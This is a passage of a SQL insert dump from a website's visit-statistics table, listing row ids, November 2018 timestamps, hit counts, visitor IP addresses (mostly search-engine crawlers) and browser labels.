,1,0,0,'54.36.148.143','other'),(338703,1542911220,1,1,0,0,'54.36.148.28','other'),(338704,1542911364,1,1,0,0,'54.36.148.225','other'),(338705,1542911403,1,1,0,0,'54.36.148.204','other'),(338706,1542911551,1,1,0,0,'54.36.148.135','other'),(338707,1542911605,1,1,0,0,'54.36.148.233','other'),(338708,1542911810,1,0,1,0,'66.249.66.156',''),(338709,1542911846,1,1,0,0,'54.36.148.105','other'),(338710,1542911890,1,1,0,0,'178.255.215.94','other'),(338711,1542911900,1,1,0,0,'54.36.149.65','other'),(338712,1542912018,1,1,0,0,'54.36.148.27','other'),(338713,1542912055,1,1,0,0,'54.36.148.21','other'),(338714,1542912116,1,1,0,0,'54.36.148.217','other'),(338715,1542912181,1,1,0,0,'54.36.148.54','other'),(338716,1542912242,1,1,0,0,'54.36.148.244','other'),(338717,1542912342,1,1,0,0,'178.154.244.29','other'),(338718,1542912372,1,1,0,0,'46.229.168.129','other'),(338719,1542912427,1,1,0,0,'54.36.149.103','other'),(338720,1542912518,1,1,0,0,'54.36.148.121','other'),(338721,1542912657,1,1,0,0,'66.249.66.61','chrome'),(338723,1542912698,1,1,0,0,'54.36.149.39','other'),(338724,1542912787,1,1,0,0,'54.36.149.51','other'),(338725,1542912839,1,1,0,0,'66.249.66.152','chrome'),(338726,1542913028,1,1,0,0,'95.163.255.170','other'),(338727,1542913031,1,1,0,0,'95.163.255.167','other'),(338728,1542913039,1,1,0,0,'54.36.148.59','other'),(338729,1542913045,1,1,0,0,'54.36.149.27','other'),(338730,1542913069,1,1,0,0,'54.36.148.120','other'),(338731,1542913228,1,1,0,0,'54.36.149.67','other'),(338732,1542913236,1,1,0,0,'54.36.149.57','other'),(338733,1542913409,1,1,0,0,'54.36.148.185','other'),(338734,1542913479,1,1,0,0,'54.36.149.92','other'),(338735,1542913557,1,1,0,0,'93.78.184.95','firefox'),(338736,1542913813,1,1,0,0,'66.249.66.42','chrome'),(338737,1542913891,1,1,0,0,'54.36.148.224','other'),(338738,1542914034,1,1,0,0,'54.36.148.17','other'),(338739,1542914041,1,1,0,0,'46.229.168.135','other'),(338740,1542914212,1,1,0,0,'54.36.148.14','other'),(338741,1542914476,1,1,0,0,'54.36.149.39','other'),(338742,1542914495,1,1,0,0,'54.36.148.75','other'),(338743,1542914649,1,1,0,0,'66.249.66.44','chrome'),(338744,1542914708,1,1,0,0,'54.36.148.209','other'),(338745,1542914762,1,1,0,0,'54.36.148.186','other'),(338746,1542914839,1,1,0,0,'54.36.149.53','other'),(338747,1542914845,1,1,0,0,'54.36.149.28','other'),(338748,1542915025,6,6,0,0,'5.45.207.79','other'),(338749,1542915035,3,3,0,0,'5.45.207.19','other'),(338750,1542915113,1,1,0,0,'54.36.148.104','other'),(338751,1542915182,2,2,0,0,'178.154.244.11','other'),(338752,1542915248,1,1,0,0,'54.36.149.59','other'),(338753,1542915261,1,1,0,0,'54.36.148.67','other'),(338754,1542915262,1,1,0,0,'54.36.148.210','other'),(338755,1542915266,2,2,0,0,'178.154.244.29','other'),(338756,1542915400,1,1,0,0,'95.163.255.161','other'),(338757,1542915402,1,1,0,0,'95.163.255.155','other'),(338758,1542915508,2,2,0,0,'46.211.112.188','chrome'),(338759,1542915632,1,1,0,0,'157.55.39.252','other'),(338760,1542915689,1,1,0,0,'54.36.148.118','other'),(338761,1542915914,1,1,0,0,'54.36.148.55','other'),(338762,1542915926,1,1,0,0,'5.45.207.79','other'),(338763,1542916046,1,1,0,0,'54.36.148.153','other'),(338764,1542916097,1,1,0,0,'95.163.255.153','other'),(338765,1542916100,1,1,0,0,'95.163.255.168','other'),(338766,1542916102,1,1,0,0,'54.36.148.38','other'),(338767,1542916186,5,5,0,0,'178.154.244.29','other'),(338768,1542916460,5,5,0,0,'178.154.244.11','other'),(338769,1542916490,1,1,0,0,'54.36.148.31','other'),(338770,1542916605,1,1,0,0,'46.229.168.151','other'),(338771,1542916609,1,1,0,0,'46.229.168.142','other'),(338772,1542916668,1,1,0,0,'178.93.60.117','chrome'),(338773,1542916829,1,1,0,0,'54.36.148.77','other'),(338774,1542916912,1,1,0,0,'66.249.66.155','chrome'),(338776,1542916989,1,1,0,0,'54.36.148.182','other'),(338777,1542917011,1,1,0,0,'54.36.148.206','other'),(338778,1542917059,1,1,0,0,'5.45.207.19','other'),(338779,1542917109,1,1,0,0,'66.249.66.156','chrome'),(338780,1542917133,1,1,0,0,'54.36.148.68','other'),(338781,1542917177,1,1,0,0,'178.154.244.29','other'),(338782,1542917217,1,1,0,0,'54.36.148.152','other'),(338783,1542917221,1,1,0,0,'54.36.149.25','other'),(338784,1542917282,1,1,0,0,'54.36.148.124','other'),(338785,1542917294,1,1,0,0,'8.29.198.25','other'),(338786,1542917354,1,1,0,0,'54.36.148.73','other'),(338787,1542917366,1,1,0,0,'178.154.244.11','other'),(338788,1542917435,1,1,0,0,'54.36.148.255','other'),(338789,1542917488,1,1,0,0,'54.36.149.8','other'),(338790,1542917491,1,1,0,0,'54.36.148.10','other'),(338791,1542917634,1,1,0,0,'54.36.149.96','other'),(338792,1542917653,1,1,0,0,'66.249.66.153','chrome'),(338793,1542917654,1,1,0,0,'66.249.66.146','chrome'),(338794,1542917681,1,1,0,0,'66.249.66.59','chrome'),(338795,1542917682,1,1,0,0,'66.249.66.40','chrome'),(338796,1542917915,1,1,0,0,'40.77.167.85','other'),(338797,1542917939,1,1,0,0,'54.36.148.84','other'),(338798,1542918019,1,1,0,0,'54.36.148.90','other'),(338799,1542918596,1,1,0,0,'54.36.148.185','other'),(338800,1542918737,1,1,0,0,'54.36.148.205','other'),(338801,1542918780,1,1,0,0,'54.36.149.28','other'),(338802,1542918830,1,1,0,0,'46.229.168.144','other'),(338803,1542918833,1,1,0,0,'46.229.168.154','other'),(338804,1542918868,2,2,0,0,'8.29.198.26','other'),(338805,1542918885,1,1,0,0,'54.36.148.244','other'),(338806,1542918915,1,1,0,0,'54.36.148.178','other'),(338807,1542918996,1,1,0,0,'54.36.148.29','other'),(338808,1542919260,1,1,0,0,'54.36.148.63','other'),(338809,1542919273,1,1,0,0,'54.36.149.86','other'),(338810,1542919277,1,1,0,0,'54.36.148.164','other'),(338811,1542919404,1,1,0,0,'66.249.66.151','chrome'),(338812,1542919405,1,1,0,0,'66.249.66.148','chrome'),(338813,1542919415,1,1,0,0,'54.36.149.80','other'),(338814,1542919483,1,1,0,0,'40.77.167.104','other'),(338815,1542919780,1,1,0,0,'54.36.149.10','other'),(338816,1542920042,1,1,0,0,'54.36.148.110','other'),(338817,1542920180,1,1,0,0,'54.36.148.55','other'),(338818,1542920376,1,1,0,0,'54.36.149.62','other'),(338819,1542920390,1,1,0,0,'46.229.168.153','other'),(338820,1542920419,1,1,0,0,'54.36.148.251','other'),(338821,1542920514,1,1,0,0,'178.154.244.11','other'),(338822,1542920522,1,1,0,0,'54.36.148.219','other'),(338823,1542920626,1,1,0,0,'54.36.148.194','other'),(338824,1542920640,1,1,0,0,'46.229.168.139','other'),(338825,1542920642,1,1,0,0,'46.229.168.130','other'),(338826,1542920746,1,1,0,0,'54.36.148.186','other'),(338827,1542920751,1,1,0,0,'54.36.148.17','other'),(338828,1542920753,1,1,0,0,'54.36.149.67','other'),(338829,1542920857,1,1,0,0,'54.36.148.96','other'),(338830,1542920877,1,1,0,0,'54.36.149.22','other'),(338831,1542921107,1,1,0,0,'54.36.149.14','other'),(338832,1542921286,1,1,0,0,'54.36.148.229','other'),(338833,1542921365,1,1,0,0,'54.36.148.66','other'),(338834,1542921595,1,1,0,0,'46.229.168.135','other'),(338835,1542921597,1,1,0,0,'46.229.168.154','other'),(338836,1542921651,1,1,0,0,'54.36.148.53','other'),(338837,1542921870,1,1,0,0,'54.36.149.1','other'),(338838,1542921984,1,1,0,0,'40.77.167.162','other'),(338839,1542922144,1,1,0,0,'54.36.148.158','other'),(338840,1542922326,1,1,0,0,'54.36.148.11','other'),(338841,1542922413,1,1,0,0,'54.36.148.183','other'),(338842,1542922472,1,1,0,0,'54.36.149.83','other'),(338843,1542922732,1,1,0,0,'193.160.224.14','other'),(338844,1542922908,1,1,0,0,'54.36.148.36','other'),(338845,1542923057,2,2,0,0,'178.154.244.11','other'),(338846,1542923058,2,2,0,0,'5.45.207.19','other'),(338847,1542923061,1,1,0,0,'178.154.244.29','other'),(338848,1542923086,1,1,0,0,'54.36.148.199','other'),(338849,1542923445,1,1,0,0,'66.249.66.42','chrome'),(338850,1542923667,1,1,0,0,'54.36.148.232','other'),(338851,1542923802,1,1,0,0,'54.36.149.64','other'),(338852,1542924064,1,1,0,0,'66.249.66.152','chrome'),(338853,1542924082,1,1,0,0,'54.36.149.44','other'),(338854,1542924109,1,1,0,0,'54.36.148.185','other'),(338855,1542924139,1,1,0,0,'54.36.148.207','other'),(338856,1542924225,1,1,0,0,'66.249.66.156','chrome'),(338857,1542924232,1,1,0,0,'66.249.66.154','chrome'),(338858,1542924539,1,1,0,0,'54.36.149.3','other'),(338859,1542924549,1,1,0,0,'54.36.148.156','other'),(338860,1542924564,1,1,0,0,'54.36.148.53','other'),(338861,1542924651,1,1,0,0,'54.36.149.40','other'),(338862,1542924793,1,1,0,0,'54.36.149.93','other'),(338863,1542924864,1,1,0,0,'54.36.148.171','other'),(338864,1542925242,1,1,0,0,'54.36.148.246','other'),(338865,1542925398,1,1,0,0,'54.36.149.68','other'),(338866,1542925564,1,1,0,0,'54.36.148.114','other'),(338867,1542925832,1,1,0,0,'54.36.149.56','other'),(338868,1542925958,1,1,0,0,'54.36.148.151','other'),(338869,1542925988,1,1,0,0,'92.253.251.181','chrome'),(338870,1542926044,1,1,0,0,'54.36.148.117','other'),(338871,1542926085,1,1,0,0,'54.36.148.197','other'),(338872,1542926174,1,1,0,0,'54.36.148.213','other'),(338873,1542926238,1,1,0,0,'54.36.148.37','other'),(338874,1542926277,1,1,0,0,'66.249.66.42','chrome'),(338875,1542926319,1,1,0,0,'54.36.149.6','other'),(338876,1542926411,1,1,0,0,'54.36.148.90','other'),(338877,1542926683,1,1,0,0,'54.36.148.33','other'),(338878,1542926795,1,1,0,0,'95.163.255.95','other'),(338879,1542926800,1,1,0,0,'95.163.255.94','other'),(338880,1542926844,1,1,0,0,'54.36.148.247','other'),(338881,1542926861,1,1,0,0,'54.36.148.103','other'),(338882,1542926926,1,1,0,0,'54.36.148.155','other'),(338883,1542926958,1,1,0,0,'54.36.148.25','other'),(338884,1542927040,1,1,0,0,'54.36.149.53','other'),(338885,1542927159,1,1,0,0,'54.36.148.236','other'),(338886,1542927173,1,1,0,0,'54.36.148.41','other'),(338887,1542927485,1,1,0,0,'54.36.148.171','other'),(338888,1542927528,1,1,0,0,'66.249.66.152','chrome'),(338889,1542927829,1,1,0,0,'95.163.255.98','other'),(338890,1542927831,1,1,0,0,'95.163.255.97','other'),(338891,1542928130,1,1,0,0,'8.29.198.25','other'),(338892,1542928226,1,1,0,0,'54.36.149.35','other'),(338893,1542928564,1,1,0,0,'54.36.148.214','other'),(338894,1542928577,1,1,0,0,'66.249.66.148','chrome'),(338895,1542928637,2,2,0,0,'157.55.39.252','other'),(338896,1542928707,1,1,0,0,'54.36.148.182','other'),(338897,1542928709,1,1,0,0,'54.36.149.78','other'),(338898,1542928799,1,1,0,0,'66.249.66.156','chrome'),(338899,1542928851,1,1,0,0,'54.36.148.21','other'),(338900,1542929003,1,1,0,0,'54.36.148.252','other'),(338901,1542929105,1,1,0,0,'54.36.148.155','other'),(338902,1542929117,1,1,0,0,'54.36.148.136','other'),(338903,1542929189,1,1,0,0,'46.229.168.138','other'),(338904,1542929335,1,1,0,0,'54.36.148.209','other'),(338905,1542929553,1,1,0,0,'54.36.149.28','other'),(338906,1542929573,1,1,0,0,'54.36.149.23','other'),(338907,1542929688,1,1,0,0,'54.36.148.63','other'),(338908,1542929696,2,2,0,0,'8.29.198.25','other'),(338909,1542929809,1,1,0,0,'54.36.149.97','other'),(338910,1542929902,1,1,0,0,'46.229.168.133','other'),(338911,1542929996,1,1,0,0,'66.249.66.156','chrome'),(338912,1542930093,1,1,0,0,'66.249.66.61','chrome'),(338913,1542930094,1,1,0,0,'66.249.66.42','chrome'),(338914,1542930160,1,1,0,0,'5.45.207.79','other'),(338915,1542930312,1,1,0,0,'213.180.203.40','other'),(338916,1542930355,1,1,0,0,'178.154.244.65','other'),(338917,1542930359,1,1,0,0,'141.8.132.16','other'),(338918,1542930389,1,1,0,0,'66.249.66.40','chrome'),(338919,1542930398,2,2,0,0,'178.154.244.29','other'),(338920,1542930403,1,1,0,0,'54.36.148.97','other'),(338921,1542930512,1,1,0,0,'54.36.148.82','other'),(338922,1542930523,1,1,0,0,'54.36.148.143','other'),(338923,1542930534,1,1,0,0,'54.36.148.90','other'),(338924,1542930635,2,2,0,0,'37.9.113.20','other'),(338925,1542930699,1,1,0,0,'54.36.148.138','other'),(338926,1542930916,2,2,0,0,'178.154.244.11','other'),(338927,1542930922,1,1,0,0,'54.36.149.18','other'),(338928,1542930985,1,1,0,0,'46.165.230.5','other'),(338929,1542930996,1,1,0,0,'46.166.139.35','other'),(338930,1542931058,1,1,0,0,'46.229.168.151','other'),(338931,1542931268,1,1,0,0,'66.249.66.152','chrome'),(338932,1542931280,1,1,0,0,'54.36.148.33','other'),(338933,1542931569,1,1,0,0,'54.36.149.64','other'),(338934,1542931594,1,1,0,0,'54.36.149.83','other'),(338935,1542931638,2,2,0,0,'178.154.244.29','other'),(338936,1542931720,1,1,0,0,'66.249.66.154','chrome'),(338937,1542931722,1,1,0,0,'5.45.207.19','other'),(338938,1542931724,1,1,0,0,'5.45.207.79','other'),(338939,1542931973,2,2,0,0,'178.154.244.11','other'),(338940,1542931974,1,1,0,0,'54.36.148.60','other'),(338941,1542932209,1,1,0,0,'54.36.148.54','other'),(338942,1542932572,1,1,0,0,'80.252.153.33','firefox'),(338943,1542932635,1,1,0,0,'46.229.168.141','other'),(338944,1542932684,1,1,0,0,'157.55.39.252','other'),(338945,1542932789,1,1,0,0,'54.36.149.29','other'),(338946,1542932829,1,1,0,0,'54.36.148.180','other'),(338947,1542933005,1,1,0,0,'54.36.148.91','other'),(338948,1542933048,1,1,0,0,'54.36.149.89','other'),(338949,1542933051,1,1,0,0,'66.249.66.40','chrome'),(338950,1542933069,1,1,0,0,'92.253.251.181','firefox'),(338951,1542933250,1,1,0,0,'54.36.148.99','other'),(338952,1542933304,1,1,0,0,'54.36.148.98','other'),(338953,1542933698,1,1,0,0,'54.36.148.59','other'),(338954,1542933887,12,12,0,0,'23.237.4.26','other'),(338955,1542934124,1,1,0,0,'54.36.149.74','other'),(338956,1542934272,1,1,0,0,'54.36.148.57','other'),(338957,1542934386,1,1,0,0,'54.36.148.36','other'),(338958,1542934402,1,1,0,0,'54.36.149.87','other'),(338959,1542934546,1,1,0,0,'54.36.148.159','other'),(338960,1542934571,1,1,0,0,'54.36.149.70','other'),(338961,1542934721,1,1,0,0,'54.36.149.52','other'),(338962,1542934755,1,1,0,0,'66.249.66.156','chrome'),(338963,1542934834,1,1,0,0,'54.36.148.41','other'),(338964,1542934862,1,1,0,0,'54.36.149.103','other'),(338965,1542935142,1,1,0,0,'54.36.149.73','other'),(338966,1542935229,1,1,0,0,'54.36.148.132','other'),(338967,1542935396,1,1,0,0,'54.36.149.69','other'),(338968,1542935500,1,1,0,0,'54.36.149.58','other'),(338969,1542935506,1,1,0,0,'54.36.148.125','other'),(338970,1542935760,1,1,0,0,'54.36.148.37','other'),(338971,1542935831,1,1,0,0,'54.36.148.189','other'),(338972,1542936021,1,0,1,0,'66.249.66.42',''),(338973,1542936559,1,1,0,0,'54.36.148.203','other'),(338974,1542936627,1,1,0,0,'188.120.242.93','firefox'),(338975,1542936706,1,1,0,0,'54.36.149.81','other'),(338976,1542936768,1,1,0,0,'54.36.148.190','other'),(338977,1542936775,1,1,0,0,'54.36.148.218','other'),(338978,1542936884,1,1,0,0,'54.36.149.62','other'),(338979,1542937008,1,1,0,0,'54.36.149.63','other'),(338980,1542937062,1,1,0,0,'54.36.148.168','other'),(338981,1542937216,1,1,0,0,'54.36.148.165','other'),(338982,1542937303,1,1,0,0,'66.249.66.152','chrome'),(338983,1542937319,1,1,0,0,'54.36.148.122','other'),(338984,1542937466,1,1,0,0,'54.36.148.63','other'),(338985,1542937511,1,1,0,0,'54.36.148.52','other'),(338986,1542937906,1,1,0,0,'54.36.148.124','other'),(338987,1542937920,1,1,0,0,'54.36.148.230','other'),(338988,1542938077,1,1,0,0,'207.46.13.225','other'),(338989,1542938092,1,1,0,0,'54.36.149.50','other'),(338990,1542938266,2,2,0,0,'5.228.43.138','chrome'),(338991,1542938375,1,1,0,0,'54.36.148.162','other'),(338992,1542938478,1,1,0,0,'54.36.148.215','other'),(338993,1542938562,1,1,0,0,'54.36.148.203','other'),(338994,1542938588,1,1,0,0,'54.36.148.95','other'),(338995,1542938762,1,1,0,0,'54.36.148.30','other'),(338996,1542938870,1,1,0,0,'54.36.149.39','other'),(338997,1542938973,2,2,0,0,'54.71.83.254','chrome'),(338998,1542938992,1,1,0,0,'8.29.198.26','other'),(338999,1542939185,2,2,0,0,'54.36.148.43','other'),(339000,1542939374,1,1,0,0,'54.36.148.97','other'),(339001,1542939922,1,1,0,0,'54.36.148.141','other'),(339002,1542939951,1,1,0,0,'54.36.149.54','other'),(339003,1542940151,1,1,0,0,'66.249.66.154','chrome'),(339004,1542940521,1,1,0,0,'8.29.198.25','other'),(339005,1542940867,1,1,0,0,'46.229.168.141','other'),(339006,1542940949,1,1,0,0,'54.36.148.170','other'),(339007,1542940977,1,1,0,0,'54.36.149.25','other'),(339008,1542941282,1,1,0,0,'8.29.198.27','other'),(339009,1542941320,1,1,0,0,'54.36.148.192','other'),(339010,1542941414,1,1,0,0,'54.36.148.50','other'),(339011,1542941761,1,1,0,0,'54.36.148.54','other'),(339012,1542941927,1,1,0,0,'54.36.148.164','other'),(339013,1542941967,1,1,0,0,'54.36.148.251','other'),(339014,1542942057,1,1,0,0,'54.36.148.22','other'),(339015,1542942157,1,1,0,0,'54.36.148.160','other'),(339016,1542942241,1,1,0,0,'95.163.255.188','other'),(339017,1542942245,1,1,0,0,'95.163.255.196','other'),(339018,1542942394,1,1,0,0,'54.36.149.52','other'),(339019,1542942442,1,1,0,0,'54.36.148.36','other'),(339020,1542942500,1,1,0,0,'54.36.149.97','other'),(339021,1542942741,1,1,0,0,'54.36.148.141','other'),(339022,1542942939,1,1,0,0,'157.55.39.252','other'),(339023,1542943042,5,5,0,0,'178.154.244.29','other'),(339024,1542943097,1,1,0,0,'66.249.66.156','chrome'),(339025,1542943113,1,1,0,0,'54.36.148.43','other'),(339026,1542943118,1,1,0,0,'54.36.148.33','other'),(339027,1542943128,1,1,0,0,'66.249.66.152','chrome'),(339028,1542943143,1,1,0,0,'54.36.148.223','other'),(339029,1542943148,7,7,0,0,'178.154.244.11','other'),(339030,1542943247,1,1,0,0,'54.36.148.107','other'),(339031,1542943390,1,1,0,0,'54.36.148.168','other'),(339032,1542943538,1,1,0,0,'54.36.149.91','other'),(339033,1542943603,1,1,0,0,'141.8.142.103','other'),(339034,1542943619,3,3,0,0,'5.45.207.79','other'),(339035,1542943636,1,1,0,0,'54.36.149.66','other'),(339036,1542943718,1,1,0,0,'54.36.148.220','other'),(339037,1542943914,1,1,0,0,'54.36.148.129','other'),(339038,1542943945,1,1,0,0,'54.36.149.97','other'),(339039,1542943986,1,1,0,0,'54.36.149.94','other'),(339040,1542944080,1,1,0,0,'178.154.244.29','other'),(339041,1542944109,4,4,0,0,'178.154.244.11','other'),(339042,1542944257,1,1,0,0,'54.36.149.30','other'),(339043,1542944380,1,1,0,0,'5.45.207.19','other'),(339044,1542944414,1,1,0,0,'54.36.148.57','other'),(339045,1542944467,1,1,0,0,'54.36.148.27','other'),(339046,1542944495,1,1,0,0,'66.249.66.42','chrome'),(339047,1542944516,1,1,0,0,'54.36.149.21','other'),(339048,1542944556,3,3,0,0,'157.55.39.252','other'),(339049,1542944615,1,1,0,0,'54.36.149.76','other'),(339050,1542944730,1,1,0,0,'95.163.255.99','other'),(339051,1542944733,1,1,0,0,'95.163.255.92','other'),(339052,1542944803,1,1,0,0,'54.36.149.103','other'),(339053,1542944929,1,1,0,0,'54.36.149.49','other'),(339054,1542945024,1,1,0,0,'54.36.148.209','other'),(339055,1542945169,1,1,0,0,'54.36.148.241','other'),(339056,1542945178,1,1,0,0,'54.36.148.141','other'),(339057,1542945333,1,1,0,0,'54.36.149.19','other'),(339058,1542945605,1,1,0,0,'66.249.66.154','chrome'),(339059,1542945871,1,1,0,0,'46.229.168.152','other'),(339060,1542945894,1,1,0,0,'66.249.66.59','chrome'),(339061,1542945904,1,1,0,0,'66.249.66.40','chrome'),(339062,1542945906,1,1,0,0,'54.36.148.35','other'),(339063,1542946102,2,2,0,0,'54.36.149.68','other'),(339064,1542946164,1,1,0,0,'92.113.116.175','chrome'),(339065,1542946199,1,1,0,0,'54.36.149.18','other'),(339066,1542946283,1,1,0,0,'54.36.148.45','other'),(339067,1542946409,1,1,0,0,'54.36.148.90','other'),(339068,1542946464,1,1,0,0,'66.249.66.156','chrome'),(339069,1542946480,1,1,0,0,'54.36.148.160','other'),(339070,1542946876,1,1,0,0,'54.36.148.213','other'),(339071,1542947082,1,1,0,0,'54.36.149.2','other'),(339072,1542947147,1,1,0,0,'54.36.148.194','other'),(339073,1542947165,1,1,0,0,'95.163.255.191','other'),(339074,1542947168,1,1,0,0,'95.163.255.192','other'),(339075,1542947198,1,1,0,0,'54.36.148.53','other'),(339076,1542947356,1,1,0,0,'54.36.148.26','other'),(339077,1542947449,1,1,0,0,'54.36.148.51','other'),(339078,1542947596,1,1,0,0,'54.36.149.12','other'),(339079,1542947804,1,1,0,0,'66.249.66.157','chrome'),(339080,1542947806,1,1,0,0,'66.249.66.152','chrome'),(339081,1542947864,1,1,0,0,'54.36.148.255','other'),(339082,1542947976,2,2,0,0,'66.249.66.44','chrome'),(339083,1542948262,1,1,0,0,'40.77.167.85','other'),(339084,1542948267,1,1,0,0,'54.36.149.87','other'),(339085,1542948285,1,1,0,0,'54.36.148.182','other'),(339086,1542948317,1,1,0,0,'54.36.148.55','other'),(339087,1542948378,2,2,0,0,'54.36.148.185','other'),(339088,1542948432,1,1,0,0,'54.36.149.57','other'),(339089,1542948433,1,1,0,0,'141.8.142.103','other'),(339090,1542948450,1,1,0,0,'178.154.244.11','other'),(339091,1542948528,1,1,0,0,'54.36.148.116','other'),(339092,1542948754,1,1,0,0,'54.36.148.113','other'),(339093,1542948868,1,1,0,0,'54.36.148.68','other'),(339094,1542948939,1,1,0,0,'66.249.66.59','chrome'),(339095,1542948940,1,1,0,0,'66.249.66.42','chrome'),(339096,1542948969,1,1,0,0,'54.36.148.155','other'),(339097,1542949183,1,1,0,0,'66.249.66.40','chrome'),(339098,1542949189,1,1,0,0,'54.36.149.33','other'),(339099,1542949273,1,1,0,0,'54.36.148.50','other'),(339100,1542949359,1,1,0,0,'54.36.148.117','other'),(339101,1542949367,1,1,0,0,'54.36.148.85','other'),(339102,1542949558,1,1,0,0,'54.36.148.135','other'),(339103,1542949675,1,1,0,0,'54.36.148.169','other'),(339104,1542949725,1,1,0,0,'54.36.148.161','other'),(339105,1542949830,1,1,0,0,'8.29.198.25','other'),(339106,1542949837,1,1,0,0,'54.36.149.16','other'),(339107,1542949858,3,3,0,0,'66.249.66.157','chrome'),(339109,1542949888,2,2,0,0,'66.249.66.156','chrome'),(339110,1542949909,1,1,0,0,'66.249.66.155','chrome'),(339111,1542949910,1,1,0,0,'66.249.66.154','chrome'),(339112,1542949989,1,1,0,0,'54.36.148.149','other'),(339113,1542950008,1,1,0,0,'66.249.66.59','chrome'),(339114,1542950010,1,1,0,0,'66.249.66.44','chrome'),(339115,1542950346,1,1,0,0,'54.36.148.157','other'),(339116,1542950370,1,1,0,0,'54.36.148.13','other'),(339117,1542950476,1,1,0,0,'54.36.148.47','other'),(339118,1542950736,1,1,0,0,'54.36.148.178','other'),(339119,1542950859,1,1,0,0,'66.249.66.152','chrome'),(339120,1542950920,1,1,0,0,'54.36.148.84','other'),(339121,1542951342,2,2,0,0,'8.29.198.26','other'),(339122,1542951377,1,1,0,0,'66.249.66.154','chrome'),(339123,1542951423,1,1,0,0,'54.36.148.113','other'),(339124,1542951429,1,1,0,0,'54.36.148.69','other'),(339125,1542951493,1,1,0,0,'54.36.148.150','other'),(339126,1542951675,1,1,0,0,'54.36.148.167','other'),(339127,1542951722,1,1,0,0,'54.36.148.33','other'),(339128,1542951878,1,1,0,0,'54.36.148.24','other'),(339129,1542952300,1,1,0,0,'54.36.149.95','other'),(339130,1542952423,1,1,0,0,'54.36.148.21','other'),(339131,1542952514,1,1,0,0,'54.36.148.35','other'),(339132,1542952547,1,1,0,0,'54.36.148.40','other'),(339133,1542952920,2,2,0,0,'54.36.148.227','other'),(339134,1542953037,1,1,0,0,'54.36.148.251','other'),(339135,1542953098,1,1,0,0,'54.36.148.199','other'),(339136,1542953156,1,1,0,0,'5.45.207.79','other'),(339137,1542953160,3,3,0,0,'178.154.244.11','other'),(339138,1542953161,2,2,0,0,'178.154.244.29','other'),(339139,1542953217,1,1,0,0,'54.36.148.211','other'),(339140,1542953494,1,1,0,0,'54.36.148.136','other'),(339141,1542953522,1,1,0,0,'54.36.148.176','other'),(339142,1542953574,1,1,0,0,'95.163.255.165','other'),(339143,1542953577,1,1,0,0,'95.163.255.174','other'),(339144,1542953735,1,1,0,0,'54.36.149.75','other'),(339145,1542953801,1,1,0,0,'54.36.148.24','other'),(339146,1542953854,1,1,0,0,'40.77.167.162','other'),(339147,1542953866,1,1,0,0,'54.36.148.127','other'),(339148,1542953992,1,1,0,0,'66.249.66.155','chrome'),(339149,1542953993,1,1,0,0,'66.249.66.156','chrome'),(339150,1542954052,1,1,0,0,'54.36.149.91','other'),(339151,1542954279,1,1,0,0,'54.36.148.218','other'),(339152,1542954353,1,1,0,0,'95.163.255.95','other'),(339153,1542954356,1,1,0,0,'95.163.255.97','other'),(339154,1542954525,1,1,0,0,'54.36.148.121','other'),(339155,1542955156,1,1,0,0,'54.36.149.43','other'),(339156,1542955514,1,1,0,0,'54.36.148.84','other'),(339157,1542955682,1,1,0,0,'54.36.148.146','other'),(339158,1542955963,1,1,0,0,'54.36.148.50','other'),(339159,1542956231,1,1,0,0,'66.249.66.152','chrome'),(339160,1542956319,1,1,0,0,'66.249.66.59','chrome'),(339161,1542956320,1,1,0,0,'66.249.66.40','chrome'),(339162,1542956340,1,1,0,0,'54.36.148.92','other'),(339163,1542956356,2,2,0,0,'95.108.213.4','other'),(339164,1542956366,1,1,0,0,'141.8.142.103','other'),(339165,1542956375,1,1,0,0,'54.36.149.83','other'),(339166,1542956381,1,1,0,0,'54.36.149.31','other'),(339167,1542956574,1,1,0,0,'54.36.148.209','other'),(339168,1542956635,2,2,0,0,'178.154.244.11','other'),(339169,1542956637,1,1,0,0,'54.36.149.6','other'),(339170,1542956757,1,1,0,0,'54.36.149.76','other'),(339171,1542956760,1,1,0,0,'91.196.178.130','chrome'),(339172,1542956811,1,1,0,0,'54.36.148.139','other'),(339173,1542956813,1,1,0,0,'54.36.148.171','other'),(339174,1542956854,1,1,0,0,'54.36.149.93','other'),(339175,1542957142,1,1,0,0,'5.45.207.19','other'),(339176,1542957195,1,1,0,0,'5.45.207.79','other'),(339177,1542957226,1,1,0,0,'54.36.148.225','other'),(339178,1542957460,1,1,0,0,'54.36.148.69','other'),(339179,1542957581,1,1,0,0,'54.36.148.243','other'),(339180,1542957829,2,2,0,0,'157.55.39.252','other'),(339181,1542958010,1,1,0,0,'54.36.149.67','other'),(339182,1542958294,1,1,0,0,'54.36.148.172','other'),(339183,1542958639,1,1,0,0,'54.36.148.98','other'),(339184,1542958647,1,1,0,0,'54.36.148.53','other'),(339185,1542958749,1,1,0,0,'54.36.148.247','other'),(339186,1542958841,1,1,0,0,'54.36.148.226','other'),(339187,1542959248,2,2,0,0,'95.132.11.190','firefox'),(339188,1542959293,1,1,0,0,'54.36.149.106','other'),(339189,1542959340,1,1,0,0,'54.36.148.69','other'),(339190,1542959582,1,1,0,0,'54.36.148.55','other'),(339191,1542959643,2,2,0,0,'91.196.178.172','chrome'),(339192,1542959664,1,1,0,0,'54.36.149.12','other'),(339193,1542959688,1,1,0,0,'54.36.148.17','other'),(339194,1542959787,1,1,0,0,'54.36.148.60','other'),(339195,1542959810,1,1,0,0,'54.36.148.198','other'),(339196,1542959854,3,3,0,0,'66.249.66.156','chrome'),(339197,1542960338,1,1,0,0,'54.36.148.197','other'),(339198,1542960446,1,1,0,0,'54.36.148.180','other'),(339199,1542960461,1,1,0,0,'66.249.66.157','chrome'),(339200,1542960558,2,2,0,0,'91.196.178.81','chrome'),(339201,1542960578,1,1,0,0,'95.108.213.4','other'),(339202,1542960669,1,1,0,0,'8.29.198.27','other'),(339203,1542960673,1,1,0,0,'54.36.148.124','other'),(339204,1542960776,1,1,0,0,'54.36.148.30','other'),(339205,1542961020,1,1,0,0,'91.229.121.2','opera'),(339206,1542961036,1,1,0,0,'54.36.148.150','other'),(339207,1542961546,1,1,0,0,'54.36.148.165','other'),(339208,1542961626,2,2,0,0,'40.77.167.162','other'),(339209,1542961707,1,1,0,0,'46.229.168.129','other'),(339210,1542961710,1,1,0,0,'46.229.168.147','other'),(339211,1542961729,2,2,0,0,'66.249.66.156','chrome'),(339212,1542961966,2,2,0,0,'157.55.39.252','other'),(339213,1542961983,1,1,0,0,'54.36.148.186','other'),(339214,1542962088,1,1,0,0,'54.36.148.84','other'),(339215,1542962131,1,1,0,0,'54.36.148.123','other'),(339216,1542962138,1,1,0,0,'54.36.148.199','other'),(339217,1542962165,1,1,0,0,